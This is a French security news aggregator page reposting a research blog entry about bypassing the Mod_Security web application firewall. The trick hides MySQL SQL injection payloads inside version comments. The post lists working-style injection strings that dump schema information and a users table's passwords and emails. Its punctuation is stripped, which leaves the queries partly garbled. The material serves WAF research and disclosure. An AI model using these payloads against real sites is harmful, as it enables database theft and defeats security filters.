|
|
|
Another fine method to exploit SQL Injection and bypass WAF |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Présentation : A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven t noticed it before. Let me describe this method of bypassing WAF. MySQL servers allow one to use comments of the following type sql-code and 12345sql-code As can be noticed, SQL code will be executed from the comment in both cases The latter construction means that sql-code should be executed only if the DBMS version is later than the given value. As I have been repeatedly asserted 1,2 , some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security v. 2.5.9 . Here is a simple example ... query SELECT name FROM table where id . GET id result mysql_query query ... If a web application is protected with Mod_Security, then the following request will be forbidden id 1 union select 1 It is remarkable that even these requests that are incorrect in the considered example will be also forbidden by the WAF HPP HPF techniques id 1 union id select table_name from information_schema.columns id 1 union blabla1 select table_name blabla2 from information_schema.columns But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection id 1 limit 0 union select concat_ws 0x3a,table_name,column_name from information_schema.columns id 1 12345limit 0 union select concat_ws 0x3a,table_name,column_name from information_schema.columns id 1 limit 0 union select concat_ws 0x3a,username,password,email from users Well, one more method to our arsenal -
Les mots clés de la revue de presse pour cet article : exploit bypass Les videos sur SecuObs pour les mots clés : exploit bypass Les mots clés pour les articles publiés sur SecuObs : exploit Les éléments de la revue Twitter pour les mots clé : exploit bypass
Les derniers articles du site " Positive Technologies Research Lab" :
- RFI over SQL Injection Cross-Site Scripting - Magic Quotes - Methods of Quick Exploitation of Blind SQL Injection - Juniper JUNOS Remote Kernel Crash Flaw - WASC Threat Classification v2.0 is Out - Over 32 million accounts have been compromised the result of an attack on the RockYou.com site - HTTP Parameter Fragmentation HPF is one of the methods to bypass security filters in web applications - non blind SQL Injection - Password analysis for Windows Live Hotmail users - Another fine method to exploit SQL Injection and bypass WAF
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|